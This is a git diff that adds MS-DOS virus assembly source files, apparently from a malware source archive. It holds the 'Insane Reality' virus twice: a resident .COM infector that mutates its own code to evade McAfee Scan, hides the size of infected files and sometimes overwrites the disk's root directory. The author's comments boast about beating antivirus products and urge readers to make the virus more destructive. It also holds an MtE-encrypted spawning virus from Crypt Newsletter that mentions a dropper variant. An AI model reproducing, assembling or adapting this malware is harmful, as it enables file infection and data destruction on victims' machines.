22/09/1993 +; +; +; This is a mutation of the Leech virus, and well, +; havn't really changed much in this code, just +; fooled Mcafee's Scan and Dr Alans Toolkit.. +; +; Okey, this might not be the very best mutation born, +; but think in this way, if this mutation is so bad +; then aren't the anti-virus products even worse ? +; +; The original virus was pretty "OK", it is a non-over- +; writing resident .COM. It will infect the program +; after you have started it. It will not infect renamed +; exe files. (..It looks at the victim's fileheader..) +; +; When the virus is in memory a infected files attributes +; (..size/date/time..) will not be discovored. If you boot +; your computer, and throw the virus out from memory, +; you'll see that the file has been changed. If an +; infected file is being run again, the virus will +; replace the infected file with its old file-attributes. +; +; This virus was originally written in Bulgaria.. +; (..where else..) and I would like to thank the +; scratch coder of this little babe very much... +; +; Really hope this file will annoy some folks around, +; cuz it certainly annoyed me!..... +; +; Mcafee's Scan v108 can't find this, and neither can +; S&S Toolkit 6.54. Havn't tried with Tbscan/F-prot, +; but they will probably identify this as the leech virus. +; +; Beware of the Insane Reality we're living in! +; Signed The Unforgiven / Immortal Riot + + .model tiny + .code + org 0 + +; -------------- +; Disassembly by Dark Angel of Phalcon/Skism +; Assemble with Tasm /m Insane.asm, then link +; and use exe2bin for make this into a .com.. +; ------------ + +virlength = (readbuffer - leech) +reslength = (((encrypted_file - leech + 15) / 16) + 2) + +leech: + jmp short enter_leech + +filesize dw offset carrier +oldint21 dw 0, 0 +oldint13 dw 0, 0 +oldint24 dw 0, 0 +datestore dw 0 +timestore dw 0 +runningflag db 1 +evenodd dw 0 + +enter_leech: + call next +next: + pop si + db 0 ; Scan-fooler.. + +mutatearea1: + cli ; prevent all interupts + push ds ; Why? + pop es + mov bp,sp ; save sp + mov sp,si ; sp = offset next + add sp,encrypt_value1 - 1 - next +mutatearea2: + mov cx,ss ; save ss + mov ax,cs + mov ss,ax ; ss = PSP + pop bx ; get encryption value + dec sp + dec sp + add si,startencrypt - next + nop +decrypt: +mutatearea3: + pop ax + xor al,bh ; decrypt away! + push ax + dec sp + cmp sp,si + jae decrypt +startencrypt: + mov ax,es + dec ax + mov ds,ax ; ds->MCB + db 81h,6,3,0 ;add word ptr ds:[3],-reslength + dw 0 - reslength + mov bx,ds:[3] ; bx = memory size + mov byte ptr ds:[0],'Z' ; mark end of chain + inc ax ; ax->PSP + inc bx + add bx,ax ; bx->high area + mov es,bx ; as does es + mov ss,cx ; restore ss + add si,leech - startencrypt + mov bx,ds ; save MCB segment + mov ds,ax + mov sp,bp ; restore sp + push si + xor di,di + mov cx,virlength ; 1024 bytes + cld + rep movsb + pop si + push bx + mov bx,offset highentry + push es + push bx + retf ; jmp to highentry in + ; high memory +highentry: + mov es,ax ; es->PSP + mov ax,cs:filesize + add ax,100h ; find stored area + mov di,si + mov si,ax + mov cx,virlength + rep movsb ; and restore over virus code + pop es ; MCB + xor ax,ax + mov ds,ax ; ds -> interrupt table + sti + cmp word ptr ds:21h*4,offset int21 ; already resident? + jne go_resident + db 26h,81h,2eh,3,0 ;sub word ptr es:[3],-reslength + dw 0 - reslength ;alter memory size + test byte ptr ds:[46Ch],0E7h ;1.17% chance of activation + jnz exit_virus + push cs + pop ds + mov si,offset message ; "Insane Reality.." +display_loop: ; display ASCIIZ string + lodsb ; get next character + or al,0 ; exit if 0 + jz exit_display_loop + mov ah,0Eh ; otherwise write character + int 10h + + jmp short display_loop +exit_display_loop: + mov ah,32h ; Get DPB -> DS:BX + xor dl,dl + int 21h + jc exit_virus ; exit on error + + call getint13and24 + call setint13and24 + mov dx,[bx+10h] ; first sector of root + ; directory + ; BUG: won't work in DOS 4+ + mov ah,19h ; default drive -> al + int 21h + + mov cx,2 ; Overwrite root directory + int 26h ; Direct write.. + + pop bx + call setint13and24 ; restore int handlers +exit_virus: + jmp returnCOM +go_resident: + db 26h, 81h, 6, 12h, 0 ;add word ptr es:12h,-reslength + dw 0 - reslength ;alter top of memory in PSP + mov bx,ds:46Ch ;BX = random # + push ds + push cs + pop ds + push cs + pop es + mov runningflag,1 ; reset flag + and bh,80h + mov nothing1,bh +mutate1: + test bl,1 + jnz mutate2 + mov si,offset mutatearea1 + add si,evenodd + lodsb + xchg al,[si] ; swap instructions + mov [si-1],al +mutate2: + test bl,2 + jnz mutate3 + mov si,offset mutatearea2 + add si,evenodd + lodsw + xchg ax,[si] ; swap instructions + mov [si-2],ax +mutate3: + test bl,4 + jnz mutate4 + mov si,offset mutatearea3 + mov al,2 + xor [si],al ; flip between ax & dx + xor [si+2],al + xor [si+3],al +mutate4: + test bl,8 + jnz findint21 + mov si,offset next + mov di,offset readbuffer + mov cx,offset enter_leech + push si + push di + lodsb + cmp al,5Eh ; 1 byte pop si? + je now_single_byte_encode + inc si ; skip second byte of two + ; byte encoding of pop si +now_single_byte_encode: + push cx + rep movsb + pop cx + pop si + pop di + cmp al,5Eh ; 1 byte pop si? + je encode_two_bytes ; then change to 2 + mov al,5Eh ; encode a pop si + stosb + rep movsb ; then copy decrypt over + mov al,90h ; plus a nop to keep virus + stosb ; length constant + xor ax,ax ; clear the flag + jmp short set_evenodd_flag +encode_two_bytes: + mov ax,0C68Fh ; encode a two byte form of + stosw ; pop si + rep movsb + mov ax,1 ; set evenodd flag +set_evenodd_flag: + mov cs:evenodd,ax +findint21: + mov ah,30h ; Get DOS version + int 21h + + cmp ax,1E03h ; DOS 3.30? + jne notDOS33 + + mov ah,34h ; Get DOS critical error ptr + int 21h + + mov bx,1460h ; int 21h starts here + jmp short alterint21 +notDOS33: + mov ax,3521h ;just get current int 21 handler + int 21h +alterint21: + mov oldint21,bx + mov word ptr ds:oldint21+2,es + mov si,21h*4 ; save old int 21 handler + pop ds ; found in interrupt table + push si + push cs + pop es + mov di,offset topint21 + movsw + movsw + pop di ; and put new one in + push ds + pop es + mov ax,offset int21 + stosw + mov ax,cs + stosw + + mov di,offset startencrypt + mov al,cs:encrypt_value1 ; decrypt original +decryptcode: ; program code + xor cs:[di],al + inc di + cmp di,offset decryptcode + jb decryptcode +returnCOM: + mov ah,62h ; Get current PSP + int 21h + + push bx ; restore segment registers + mov ds,bx + mov es,bx + mov ax,100h + push ax + retf ; Return to PSP:100h + +infect: + push si + push ds + push es + push di + cld + push cs + pop ds + xor dx,dx ; go to start of file + call movefilepointer + mov dx,offset readbuffer ; and read 3 bytes + mov ah,3Fh + mov cx,3 + call callint21 + jc exiterror + + xor di,di + mov ax,readbuffer + mov cx,word ptr ds:[0] + cmp cx,ax ; check if already infected + je go_exitinfect + cmp al,0EBh ; jmp short? + jne checkifJMP + mov al,ah + xor ah,ah + add ax,2 + mov di,ax ; di = jmp location +checkifJMP: + cmp al,0E9h ; jmp? + jne checkifEXE ; nope + mov ax,word ptr readbuffer+1 + add ax,3 + mov di,ax ; di = jmp location + xor ax,ax +checkifEXE: + cmp ax,'MZ' + je exiterror + cmp ax,'ZM' + jne continue_infect +exiterror: + stc +go_exitinfect: + jmp short exitinfect + nop +continue_infect: + mov dx,di + push cx + call movefilepointer ; go to jmp location + mov dx,virlength ; and read 1024 more bytes + mov ah,3Fh + mov cx,dx + call callint21 + pop cx + jc exiterror + cmp readbuffer,cx + je go_exitinfect + mov ax,di + sub ah,0FCh + cmp ax,filesize + jae exiterror + mov dx,filesize + call movefilepointer + mov dx,virlength ; write virus to middle + mov cx,dx ; of file + mov ah,40h + call callint21 + jc exitinfect + mov dx,di + call movefilepointer + push cs + pop es + mov di,offset readbuffer + push di + push di + xor si,si + mov cx,di + rep movsb + mov si,offset encrypt_value2 + mov al,encrypted_file +encryptfile: ; encrypt infected file + xor [si],al + inc si + cmp si,7FFh + jb encryptfile + pop cx + pop dx + mov ah,40h ; and write it to end of file + call callint21 +exitinfect: + pop di + pop es + pop ds + pop si + retn + +int21: + cmp ax,4B00h ; Execute? + je execute + cmp ah,3Eh ; Close? + je handleclose + cmp ah,11h ; Find first? + je findfirstnext + cmp ah,12h ; Find next? + je findfirstnext +exitint21: + db 0EAh ; jmp far ptr +topint21 dw 0, 0 + +findfirstnext: + push si + mov si,offset topint21 + pushf + call dword ptr cs:[si] ; call int 21 handler + pop si + push ax + push bx + push es + mov ah,2Fh ; Get DTA + call callint21 + cmp byte ptr es:[bx],0FFh ; extended FCB? + jne noextendedFCB + add bx,7 ; convert to normal +noextendedFCB: + mov ax,es:[bx+17h] ; Get time + and ax,1Fh ; and check infection stamp + cmp ax,1Eh + jne exitfindfirstnext + mov ax,es:[bx+1Dh] + cmp ax,virlength * 2 + 1 ; too small for infection? + jb exitfindfirstnext ; then not infected + sub ax,virlength ; alter file size + mov es:[bx+1Dh],ax +exitfindfirstnext: + pop es + pop bx + pop ax + iret + +int24: + mov al,3 + iret + +callint21: + pushf + call dword ptr cs:oldint21 + retn + +movefilepointer: + xor cx,cx + mov ax,4200h + call callint21 + retn + +execute: + push ax + push bx + mov cs:runningflag,0 + mov ax,3D00h ; open file read/only + call callint21 + mov bx,ax + mov ah,3Eh ; close file + int 21h ; to trigger infection + + pop bx + pop ax +go_exitint21: + jmp short exitint21 + +handleclose: + or cs:runningflag,0 ; virus currently active? + jnz go_exitint21 + push cx + push dx + push di + push es + push ax + push bx + call getint13and24 + call setint13and24 +; convert handle to filename + mov ax,1220h ; get job file table entry + int 2Fh + jc handleclose_noinfect ; exit on error + + mov ax,1216h ; get address of SFT + mov bl,es:[di] + xor bh,bh + int 2Fh ; es:di->file entry in SFT + + mov ax,es:[di+11h] + mov cs:filesize,ax ; save file size, + mov ax,es:[di+0Dh] + and al,0F8h + mov cs:timestore,ax ; time, + mov ax,es:[di+0Fh] + mov cs:datestore,ax ; and date + cmp word ptr es:[di+29h],'MO' ; check for COM extension + jne handleclose_noinfect + cmp byte ptr es:[di+28h],'C' + jne handleclose_noinfect + cmp cs:filesize,0FA00h ; make sure not too large + jae handleclose_noinfect + mov al,20h ; alter file attribute + xchg al,es:[di+4] + mov ah,2 ; alter open mode to + xchg ah,es:[di+2] ; read/write + pop bx + push bx + push ax + call infect + pop ax + mov es:[di+4],al ; restore file attribute + mov es:[di+2],ah ; and open mode + mov cx,cs:timestore + jc infection_not_successful + or cl,1Fh ; make file infected in + and cl,0FEh ; seconds field +infection_not_successful: + mov dx,cs:datestore ; restore file time/date + mov ax,5701h + call callint21 +handleclose_noinfect: + pop bx + pop ax + pop es + pop di + pop dx + pop cx + call callint21 + call setint13and24 + retf 2 ; exit with flags intact + +getint13and24: + mov ah,13h ; Get BIOS int 13h handler + int 2Fh + mov cs:oldint13,bx + mov cs:oldint13+2,es + + int 2Fh ; Restore it + + mov cs:oldint24,offset int24 + mov cs:oldint24+2,cs + retn + +setint13and24: + push ax + push si + push ds + pushf + cli + cld + xor ax,ax + mov ds,ax ; ds->interrupt table + + mov si,13h*4 + lodsw + xchg ax,cs:oldint13 ; replace old int 13 handler + mov [si-2],ax ; with original BIOS handler + lodsw + xchg ax,cs:oldint13+2 + mov [si-2],ax + + mov si,24h*4 ; replace old int 24 handler + lodsw ; with our own handler + xchg ax,cs:oldint24 + mov [si-2],ax + lodsw + xchg ax,cs:oldint24+2 + mov [si-2],ax + popf + pop ds + pop si + pop ax + retn + +;----------------- +; Okey..don't change the text to much here, cuz the virus will refuse +; to work correctly if you writes to many chars..If you wanna modify +; this virus, make it a bit more destructive than it already is. I +; love destructive codes..It reminds me of my Brain..(??) .. +;----------------- + +message db 'Insane Reality.. ', 0 ; Mutation name.. + db 'The Unforgiven / IR.. ' ; That's me.. + + db 0, 0, 0, 0, 0 + +encrypt_value1 db 0 +readbuffer dw 0 + db 253 dup (0) + +nothing1 db 0 + db 152 dup (0) +encrypt_value2 db 0 + db 614 dup (0) +encrypted_file db 0 + db 1280 dup (0) +carrier: + dw 20CDh + + end leech + +; Greetings goes out to Raver, Metal Militia, Scavenger, +; and all the others livi'n in the Insane Reality of today. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.insanery.asm b/MSDOS/Virus.MSDOS.Unknown.insanery.asm new file mode 100644 index 00000000..5cda495c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.insanery.asm @@ -0,0 +1,601 @@ +; VirusName : Insane Reality +; Country : Sweden +; Author : The Unforiven / Immortal Riot +; Date : 22/09/1993 +; +; +; This is a mutation of the Leech virus, and well, +; havn't really changed much in this code, just +; fooled Mcafee's Scan and Dr Alans Toolkit.. +; +; Okey, this might not be the very best mutation born, +; but think in this way, if this mutation is so bad +; then aren't the anti-virus products even worse ? +; +; The original virus was pretty "OK", it is a non-over- +; writing resident .COM. It will infect the program +; after you have started it. It will not infect renamed +; exe files. (..It looks at the victim's fileheader..) +; +; When the virus is in memory a infected files attributes +; (..size/date/time..) will not be discovored. If you boot +; your computer, and throw the virus out from memory, +; you'll see that the file has been changed. If an +; infected file is being run again, the virus will +; replace the infected file with its old file-attributes. +; +; This virus was originally written in Bulgaria.. +; (..where else..) and I would like to thank the +; scratch coder of this little babe very much... +; +; Really hope this file will annoy some folks around, +; cuz it certainly annoyed me!..... +; +; Mcafee's Scan v108 can't find this, and neither can +; S&S Toolkit 6.54. Havn't tried with Tbscan/F-prot, +; but they will probably identify this as the leech virus. +; +; Beware of the Insane Reality we're living in! +; Signed The Unforgiven / Immortal Riot + + .model tiny + .code + org 0 + +; -------------- +; Disassembly by Dark Angel of Phalcon/Skism +; Assemble with Tasm /m Insane.asm, then link +; and use exe2bin for make this into a .com.. +; ------------ + +virlength = (readbuffer - leech) +reslength = (((encrypted_file - leech + 15) / 16) + 2) + +leech: + jmp short enter_leech + +filesize dw offset carrier +oldint21 dw 0, 0 +oldint13 dw 0, 0 +oldint24 dw 0, 0 +datestore dw 0 +timestore dw 0 +runningflag db 1 +evenodd dw 0 + +enter_leech: + call next +next: + pop si + db 0 ; Scan-fooler.. + +mutatearea1: + cli ; prevent all interupts + push ds ; Why? + pop es + mov bp,sp ; save sp + mov sp,si ; sp = offset next + add sp,encrypt_value1 - 1 - next +mutatearea2: + mov cx,ss ; save ss + mov ax,cs + mov ss,ax ; ss = PSP + pop bx ; get encryption value + dec sp + dec sp + add si,startencrypt - next + nop +decrypt: +mutatearea3: + pop ax + xor al,bh ; decrypt away! + push ax + dec sp + cmp sp,si + jae decrypt +startencrypt: + mov ax,es + dec ax + mov ds,ax ; ds->MCB + db 81h,6,3,0 ;add word ptr ds:[3],-reslength + dw 0 - reslength + mov bx,ds:[3] ; bx = memory size + mov byte ptr ds:[0],'Z' ; mark end of chain + inc ax ; ax->PSP + inc bx + add bx,ax ; bx->high area + mov es,bx ; as does es + mov ss,cx ; restore ss + add si,leech - startencrypt + mov bx,ds ; save MCB segment + mov ds,ax + mov sp,bp ; restore sp + push si + xor di,di + mov cx,virlength ; 1024 bytes + cld + rep movsb + pop si + push bx + mov bx,offset highentry + push es + push bx + retf ; jmp to highentry in + ; high memory +highentry: + mov es,ax ; es->PSP + mov ax,cs:filesize + add ax,100h ; find stored area + mov di,si + mov si,ax + mov cx,virlength + rep movsb ; and restore over virus code + pop es ; MCB + xor ax,ax + mov ds,ax ; ds -> interrupt table + sti + cmp word ptr ds:21h*4,offset int21 ; already resident? + jne go_resident + db 26h,81h,2eh,3,0 ;sub word ptr es:[3],-reslength + dw 0 - reslength ;alter memory size + test byte ptr ds:[46Ch],0E7h ;1.17% chance of activation + jnz exit_virus + push cs + pop ds + mov si,offset message ; "Insane Reality.." +display_loop: ; display ASCIIZ string + lodsb ; get next character + or al,0 ; exit if 0 + jz exit_display_loop + mov ah,0Eh ; otherwise write character + int 10h + + jmp short display_loop +exit_display_loop: + mov ah,32h ; Get DPB -> DS:BX + xor dl,dl + int 21h + jc exit_virus ; exit on error + + call getint13and24 + call setint13and24 + mov dx,[bx+10h] ; first sector of root + ; directory + ; BUG: won't work in DOS 4+ + mov ah,19h ; default drive -> al + int 21h + + mov cx,2 ; Overwrite root directory + int 26h ; Direct write.. + + pop bx + call setint13and24 ; restore int handlers +exit_virus: + jmp returnCOM +go_resident: + db 26h, 81h, 6, 12h, 0 ;add word ptr es:12h,-reslength + dw 0 - reslength ;alter top of memory in PSP + mov bx,ds:46Ch ;BX = random # + push ds + push cs + pop ds + push cs + pop es + mov runningflag,1 ; reset flag + and bh,80h + mov nothing1,bh +mutate1: + test bl,1 + jnz mutate2 + mov si,offset mutatearea1 + add si,evenodd + lodsb + xchg al,[si] ; swap instructions + mov [si-1],al +mutate2: + test bl,2 + jnz mutate3 + mov si,offset mutatearea2 + add si,evenodd + lodsw + xchg ax,[si] ; swap instructions + mov [si-2],ax +mutate3: + test bl,4 + jnz mutate4 + mov si,offset mutatearea3 + mov al,2 + xor [si],al ; flip between ax & dx + xor [si+2],al + xor [si+3],al +mutate4: + test bl,8 + jnz findint21 + mov si,offset next + mov di,offset readbuffer + mov cx,offset enter_leech + push si + push di + lodsb + cmp al,5Eh ; 1 byte pop si? + je now_single_byte_encode + inc si ; skip second byte of two + ; byte encoding of pop si +now_single_byte_encode: + push cx + rep movsb + pop cx + pop si + pop di + cmp al,5Eh ; 1 byte pop si? + je encode_two_bytes ; then change to 2 + mov al,5Eh ; encode a pop si + stosb + rep movsb ; then copy decrypt over + mov al,90h ; plus a nop to keep virus + stosb ; length constant + xor ax,ax ; clear the flag + jmp short set_evenodd_flag +encode_two_bytes: + mov ax,0C68Fh ; encode a two byte form of + stosw ; pop si + rep movsb + mov ax,1 ; set evenodd flag +set_evenodd_flag: + mov cs:evenodd,ax +findint21: + mov ah,30h ; Get DOS version + int 21h + + cmp ax,1E03h ; DOS 3.30? + jne notDOS33 + + mov ah,34h ; Get DOS critical error ptr + int 21h + + mov bx,1460h ; int 21h starts here + jmp short alterint21 +notDOS33: + mov ax,3521h ;just get current int 21 handler + int 21h +alterint21: + mov oldint21,bx + mov word ptr ds:oldint21+2,es + mov si,21h*4 ; save old int 21 handler + pop ds ; found in interrupt table + push si + push cs + pop es + mov di,offset topint21 + movsw + movsw + pop di ; and put new one in + push ds + pop es + mov ax,offset int21 + stosw + mov ax,cs + stosw + + mov di,offset startencrypt + mov al,cs:encrypt_value1 ; decrypt original +decryptcode: ; program code + xor cs:[di],al + inc di + cmp di,offset decryptcode + jb decryptcode +returnCOM: + mov ah,62h ; Get current PSP + int 21h + + push bx ; restore segment registers + mov ds,bx + mov es,bx + mov ax,100h + push ax + retf ; Return to PSP:100h + +infect: + push si + push ds + push es + push di + cld + push cs + pop ds + xor dx,dx ; go to start of file + call movefilepointer + mov dx,offset readbuffer ; and read 3 bytes + mov ah,3Fh + mov cx,3 + call callint21 + jc exiterror + + xor di,di + mov ax,readbuffer + mov cx,word ptr ds:[0] + cmp cx,ax ; check if already infected + je go_exitinfect + cmp al,0EBh ; jmp short? + jne checkifJMP + mov al,ah + xor ah,ah + add ax,2 + mov di,ax ; di = jmp location +checkifJMP: + cmp al,0E9h ; jmp? + jne checkifEXE ; nope + mov ax,word ptr readbuffer+1 + add ax,3 + mov di,ax ; di = jmp location + xor ax,ax +checkifEXE: + cmp ax,'MZ' + je exiterror + cmp ax,'ZM' + jne continue_infect +exiterror: + stc +go_exitinfect: + jmp short exitinfect + nop +continue_infect: + mov dx,di + push cx + call movefilepointer ; go to jmp location + mov dx,virlength ; and read 1024 more bytes + mov ah,3Fh + mov cx,dx + call callint21 + pop cx + jc exiterror + cmp readbuffer,cx + je go_exitinfect + mov ax,di + sub ah,0FCh + cmp ax,filesize + jae exiterror + mov dx,filesize + call movefilepointer + mov dx,virlength ; write virus to middle + mov cx,dx ; of file + mov ah,40h + call callint21 + jc exitinfect + mov dx,di + call movefilepointer + push cs + pop es + mov di,offset readbuffer + push di + push di + xor si,si + mov cx,di + rep movsb + mov si,offset encrypt_value2 + mov al,encrypted_file +encryptfile: ; encrypt infected file + xor [si],al + inc si + cmp si,7FFh + jb encryptfile + pop cx + pop dx + mov ah,40h ; and write it to end of file + call callint21 +exitinfect: + pop di + pop es + pop ds + pop si + retn + +int21: + cmp ax,4B00h ; Execute? + je execute + cmp ah,3Eh ; Close? + je handleclose + cmp ah,11h ; Find first? + je findfirstnext + cmp ah,12h ; Find next? + je findfirstnext +exitint21: + db 0EAh ; jmp far ptr +topint21 dw 0, 0 + +findfirstnext: + push si + mov si,offset topint21 + pushf + call dword ptr cs:[si] ; call int 21 handler + pop si + push ax + push bx + push es + mov ah,2Fh ; Get DTA + call callint21 + cmp byte ptr es:[bx],0FFh ; extended FCB? + jne noextendedFCB + add bx,7 ; convert to normal +noextendedFCB: + mov ax,es:[bx+17h] ; Get time + and ax,1Fh ; and check infection stamp + cmp ax,1Eh + jne exitfindfirstnext + mov ax,es:[bx+1Dh] + cmp ax,virlength * 2 + 1 ; too small for infection? + jb exitfindfirstnext ; then not infected + sub ax,virlength ; alter file size + mov es:[bx+1Dh],ax +exitfindfirstnext: + pop es + pop bx + pop ax + iret + +int24: + mov al,3 + iret + +callint21: + pushf + call dword ptr cs:oldint21 + retn + +movefilepointer: + xor cx,cx + mov ax,4200h + call callint21 + retn + +execute: + push ax + push bx + mov cs:runningflag,0 + mov ax,3D00h ; open file read/only + call callint21 + mov bx,ax + mov ah,3Eh ; close file + int 21h ; to trigger infection + + pop bx + pop ax +go_exitint21: + jmp short exitint21 + +handleclose: + or cs:runningflag,0 ; virus currently active? + jnz go_exitint21 + push cx + push dx + push di + push es + push ax + push bx + call getint13and24 + call setint13and24 +; convert handle to filename + mov ax,1220h ; get job file table entry + int 2Fh + jc handleclose_noinfect ; exit on error + + mov ax,1216h ; get address of SFT + mov bl,es:[di] + xor bh,bh + int 2Fh ; es:di->file entry in SFT + + mov ax,es:[di+11h] + mov cs:filesize,ax ; save file size, + mov ax,es:[di+0Dh] + and al,0F8h + mov cs:timestore,ax ; time, + mov ax,es:[di+0Fh] + mov cs:datestore,ax ; and date + cmp word ptr es:[di+29h],'MO' ; check for COM extension + jne handleclose_noinfect + cmp byte ptr es:[di+28h],'C' + jne handleclose_noinfect + cmp cs:filesize,0FA00h ; make sure not too large + jae handleclose_noinfect + mov al,20h ; alter file attribute + xchg al,es:[di+4] + mov ah,2 ; alter open mode to + xchg ah,es:[di+2] ; read/write + pop bx + push bx + push ax + call infect + pop ax + mov es:[di+4],al ; restore file attribute + mov es:[di+2],ah ; and open mode + mov cx,cs:timestore + jc infection_not_successful + or cl,1Fh ; make file infected in + and cl,0FEh ; seconds field +infection_not_successful: + mov dx,cs:datestore ; restore file time/date + mov ax,5701h + call callint21 +handleclose_noinfect: + pop bx + pop ax + pop es + pop di + pop dx + pop cx + call callint21 + call setint13and24 + retf 2 ; exit with flags intact + +getint13and24: + mov ah,13h ; Get BIOS int 13h handler + int 2Fh + mov cs:oldint13,bx + mov cs:oldint13+2,es + + int 2Fh ; Restore it + + mov cs:oldint24,offset int24 + mov cs:oldint24+2,cs + retn + +setint13and24: + push ax + push si + push ds + pushf + cli + cld + xor ax,ax + mov ds,ax ; ds->interrupt table + + mov si,13h*4 + lodsw + xchg ax,cs:oldint13 ; replace old int 13 handler + mov [si-2],ax ; with original BIOS handler + lodsw + xchg ax,cs:oldint13+2 + mov [si-2],ax + + mov si,24h*4 ; replace old int 24 handler + lodsw ; with our own handler + xchg ax,cs:oldint24 + mov [si-2],ax + lodsw + xchg ax,cs:oldint24+2 + mov [si-2],ax + popf + pop ds + pop si + pop ax + retn + +;----------------- +; Okey..don't change the text to much here, cuz the virus will refuse +; to work correctly if you writes to many chars..If you wanna modify +; this virus, make it a bit more destructive than it already is. I +; love destructive codes..It reminds me of my Brain..(??) .. +;----------------- + +message db 'Insane Reality.. ', 0 ; Mutation name.. + db 'The Unforgiven / IR.. ' ; That's me.. + + db 0, 0, 0, 0, 0 + +encrypt_value1 db 0 +readbuffer dw 0 + db 253 dup (0) + +nothing1 db 0 + db 152 dup (0) +encrypt_value2 db 0 + db 614 dup (0) +encrypted_file db 0 + db 1280 dup (0) +carrier: + dw 20CDh + + end leech + +; Greetings goes out to Raver, Metal Militia, Scavenger, +; and all the others livi'n in the Insane Reality of today. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.insuff.asm b/MSDOS/Virus.MSDOS.Unknown.insuff.asm new file mode 100644 index 00000000..ab7ffceb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.insuff.asm @@ -0,0 +1,178 @@ +;INSUFFICIENT MEMORY virus - by URNST KOUCH for Crypt Newsletter #6 +;INSUFF MEMO is a simple MUTATION ENGINE loaded spawning virus, which +;confines itself to the current directory. To assemble with TASM 2.5, user +;must have complete MTE091B software package (including RND.OBJ, +;MTE.OBJ and stubfile, NOPS.BIN). Use MAKE2.BAT included in this +;issue of the Crypt Newsletter to assemble all proper +;components. Observant readers will notice INSUFF MEMO takes advantage of +;VCL 1.0 code as well as notation from the SARA virus. INSUFF MEMO is +;a non-threatening, unique example of an MtE-loaded companion virus - +;the only one in circulation, in fact. +; +;INSUFF2, included as a DEBUG script in this newsletter, is functionally +;identical to this virus. However, for those who 'require' a destructive +;program for their full enjoyment, it is loaded with a routine which +;simple checks the system time and branches to some 'dropper' code if +;after quitting time (4:00 pm). The 'dropper' reads from a data table +;and writes the NOIZ trojan to any .EXE in the current directory. By +;looking carefully at this code, several areas where 'potentially' +;destructive/nuisance routines can be added will suggest themselves. +;We do not include them for a number of reasons: 1) they are easy to +;come by in any number of books on assembly coding, the VCL 1.0 (an +;excellent source), or source code archives on mnay BBS's, and; 2) +;it allows you to get creative if you want and tinker (like I do all the +; time) with the basic layout of virus source. +; +;INSUFF3's source listing is modified to allow the virus to jump out +;of the current directory when all files in it are infected. The +;listing is publicly available at the BBS's listed at the end of the +;Crypt newsletter. + + .model tiny + .radix 16 + .code + + extrn mut_engine: near + extrn rnd_buf: word, data_top: near + + org 100 + +start: + call locadr + +reladr: + db 'Insufficient memory' + +locadr: + pop dx + mov cl,4 + shr dx,cl + sub dx,10 + mov cx,ds + add cx,dx ;Calculate new CS + mov dx,offset begin + push cx dx + retf +begin: + cld + mov di,offset start + push es di ; + push cs ;A carry over from the DAV + pop ds ;SARA virus, something of a curiosity + ;in this companion virus + mov dx,offset dta_buf ;Set DTA + mov ah,1a + int 21 + mov ax,3524 ;Hook INT 24, error handler + int 21 ;see bottom of code + push es bx + mov dx,offset fail_err + mov ax,2524 + int 21 + + xor ax,ax ;Initialize random seed for MtE + mov [rnd_buf],ax ;could be coded, mov cs:[rnd_buf],0 + push sp ;process necessary for generation of + pop cx ;MtE encryption key - see MtE docs + sub cx,sp ;for further notation + add cx,4 + push cx + mov dx,offset srchnam ;EXE file-mask for spawn-name search + mov cl,3 + mov ah,4e ; DOS find first file function + +find_a_file: + int 021h + jc infection_done ; Exit if no files found + jmp infect ; Infect the file! + jnc infection_done ; Exit if no error +findr: mov ah,04Fh ; DOS find next file function + jmp find_a_file ; Try finding another file + + +infection_done: + + mov ax,4C00h ;terminate + int 21h + +infect: + mov ah,02Fh ; DOS get DTA address function + int 021h + mov di,bx ; DI points to the DTA + + lea si,[di + 01Eh] ; SI points to file name + mov dx,si ; DX points to file name, too + mov di,offset spawn_name + 1; DI points to new name + xor ah,ah ; AH holds character count +transfer_loop: + lodsb ; Load a character + or al,al ; Is it a NULL? + je transfer_end ; If so then leave the loop + inc ah ; Add one to the character count + stosb ; Save the byte in the buffer + jmp short transfer_loop ; Repeat the loop +transfer_end: + mov byte ptr [spawn_name],ah; First byte holds char. count + mov byte ptr [di],13 ; Make CR the final character + mov di,dx ; DI points to file name + xor ch,ch ; + mov cl,ah ; CX holds length of filename + mov al,'.' ; AL holds char. to search for +repne scasb ; Search for a dot in the name + mov word ptr [di],'OC' ; Store "CO" as first two bytes + mov byte ptr [di + 2],'M' ; Store "M" to make "COM" + + mov byte ptr [set_carry],0 ; Assume we'll fail + mov ax,03D00h ; DOS open file function, r/o + int 021h + jnc findr ; File already exists, so leave + mov byte ptr [set_carry],1 ; Success -- the file is OK + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 21h + xchg bx,ax ; BX holds file handle + push dx cx + mov ax,offset data_top+0Fh + mov cl,4 + shr ax,cl + mov cx,cs + add ax,cx + mov es,ax + mov dx,offset start ; DX points to start of virus + mov cx,offset _DATA ; CX holds virus length for encryption + push bp bx + mov bp,0100h ;tells MtE decryption routine will + xor si,si ;hand over control to where virus adds + xor di,di ;itself to 'infected' file, in this case offset + mov bl,0Fh ;0100h .. set si/di to 0, bl to 0Fh, all required + mov ax,101 ;set bit-field in ax + call mut_engine ;call the Mutation Engine to do its thing + pop bx ax + add ax,cx + neg ax + xor ah,ah + add ax,cx + mov ah,040h ;write encrypted virus to newly created file + int 21h + mov ah,03Eh ;close the file + int 21h + cmp byte ptr [set_carry],1 + jmp infection_done ;move to end game + + + +fail_err: ;Critical error handler + mov al,3 ;prevents virus from producing + iret ;messages on write-protected disks. + ;Not handed back to machine when virus exits. +srchnam db '*.EXE',0 ;File-mask for 'spawn-search.' + + + + .data + +dta_buf db 2bh dup(?) ; Buffer for DTA +spawn_name db 12,12 dup (?),13 ; Name for next spawn +set_carry db ? ; Set-carry-on-exit flag + + end start